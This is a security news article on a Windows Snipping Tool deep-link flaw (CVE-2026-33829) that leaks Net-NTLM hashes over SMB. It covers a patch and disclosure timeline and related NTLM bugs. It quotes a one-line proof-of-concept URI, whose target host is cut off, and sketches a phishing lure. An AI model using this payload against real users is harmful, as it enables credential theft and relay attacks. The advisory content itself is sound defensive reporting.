Critical Vulnerability in Windows Snipping Tool Exposes NTLM Hashes
A recently disclosed vulnerability in Microsoft’s Snipping Tool, identified as CVE-2026-33829, allows attackers to covertly capture users’ Net-NTLM credential hashes by directing them to a malicious webpage. This flaw stems from improper handling of deep link URI registrations within the Snipping Tool, specifically through the `ms-screensketch` protocol schema.
Understanding the Vulnerability
The Snipping Tool registers a deep link that accepts a `filePath` parameter. Due to insufficient input validation, an attacker can supply a Universal Naming Convention (UNC) path pointing to a remote, attacker-controlled Server Message Block (SMB) server. This action coerces the victim’s system into initiating an authenticated SMB connection, during which the user’s Net-NTLM hash is transmitted to the attacker’s server.
Proof-of-Concept Exploit
Security researchers at Black Arrow discovered and reported this vulnerability, coordinating disclosure with Microsoft before making it public. The proof-of-concept (PoC) exploit demonstrates the attack’s simplicity:
“`
ms-screensketch:edit?&filePath=\\
“`
When a victim accesses this link, the Snipping Tool launches and attempts to load the remote resource over SMB. During this process, Windows automatically sends the user’s Net-NTLM authentication response to the attacker’s server, exposing credentials that can be cracked offline or used in NTLM relay attacks against internal network resources.
Exploitation and Social Engineering
This vulnerability is particularly dangerous due to its potential use in social engineering campaigns. Since the Snipping Tool opens as expected during exploitation, the attack appears legitimate. For instance, an attacker could register a domain like `snip.example.com` and serve a convincing image URL that silently delivers the malicious deep link payload. The victim perceives normal behavior, while NTLM authentication occurs transparently in the background.
Patch and Mitigation
Microsoft addressed this vulnerability in its April 14, 2026, Patch Tuesday security update. The disclosure timeline is as follows:
– March 23, 2026: Vulnerability reported to Microsoft.
– April 14, 2026: Microsoft releases a security patch.
– April 14, 2026: Coordinated public advisory and PoC release.
Users and organizations running affected versions of the Windows Snipping Tool should immediately apply the April 14, 2026, security update. Additionally, monitoring internal networks for unexpected outbound SMB connections (port 445) to external or unknown hosts is advisable, as these could indicate active exploitation attempts. Blocking outbound SMB traffic at the network perimeter is a strong defensive measure, regardless of patch status.
Broader Context of NTLM Vulnerabilities
This incident is part of a series of NTLM-related vulnerabilities affecting Windows systems. For example, in March 2025, a critical zero-day vulnerability allowed attackers to steal NTLM credentials by having users view a malicious file in Windows Explorer. This flaw affected all Windows operating systems from Windows 7 and Server 2008 R2 through Windows 11 v24H2 and Server 2025. Attackers could exploit this by having users open a shared folder, insert a USB drive containing the malicious file, or view a Downloads folder with such a file. Security researchers developed and released micropatches to mitigate the issue until Microsoft provided an official fix. ([cybersecuritynews.com](https://cybersecuritynews.com/new-windows-zero-day-vulnerability/?utm_source=openai))
In another instance, a vulnerability in Windows File Explorer, identified as CVE-2025-24071, enabled attackers to steal NTLM hashed passwords without any user interaction beyond extracting a compressed file. This high-severity flaw was patched by Microsoft in March 2025. The vulnerability exploited Windows Explorer’s automatic file processing mechanism, where a specially crafted .library-ms file containing a malicious SMB path could trigger the leak of NTLM hashes. ([cybersecuritynews.com](https://cybersecuritynews.com/microsoft-windows-file-explorer-vulnerability-let-attackers/?utm_source=openai))
Furthermore, in April 2025, cybercriminals actively exploited a critical vulnerability in Windows systems, identified as CVE-2025-24054, which leveraged NTLM hash disclosure through spoofing techniques. This vulnerability allowed attackers to leak NTLM hashes and potentially escalate privileges or move laterally within compromised networks. Despite the availability of a security patch, threat actors began exploiting this flaw within days of its release, targeting government and private institutions primarily in Poland and Romania. ([cybersecuritynews.com](https://cybersecuritynews.com/hackers-exploiting-ntlm-spoofing-vulnerability/?utm_source=openai))
Conclusion
The disclosure of CVE-2026-33829 underscores the ongoing challenges associated with NTLM vulnerabilities in Windows systems. Users and organizations must remain vigilant, promptly apply security updates, and implement robust monitoring to detect and prevent exploitation attempts.
